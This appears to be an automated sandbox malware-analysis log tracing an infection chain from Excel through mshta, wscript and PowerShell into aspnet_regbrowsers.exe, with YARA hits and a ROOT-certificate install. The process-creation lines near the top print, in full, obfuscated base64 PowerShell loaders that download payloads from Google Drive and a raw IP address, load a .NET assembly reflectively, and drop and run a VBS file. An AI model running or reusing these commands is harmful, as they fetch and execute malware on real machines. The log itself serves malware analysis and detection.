Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"

Yara detected aPLib compressed binary

Source: Yara match	File source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regbrowsers.exe PID: 3900, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE89A0022D push eax; iretd	5_2_000007FE89A00241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE89A000BD pushad ; iretd	5_2_000007FE89A000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE89A00BAD push eax; ret	5_2_000007FE89A00BC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 26_2_00402AC0 push eax; ret	26_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 26_2_00402AC0 push eax; ret	26_2_00402AFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 26_2_01272E4B push cs; retf	26_2_01272E6A

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
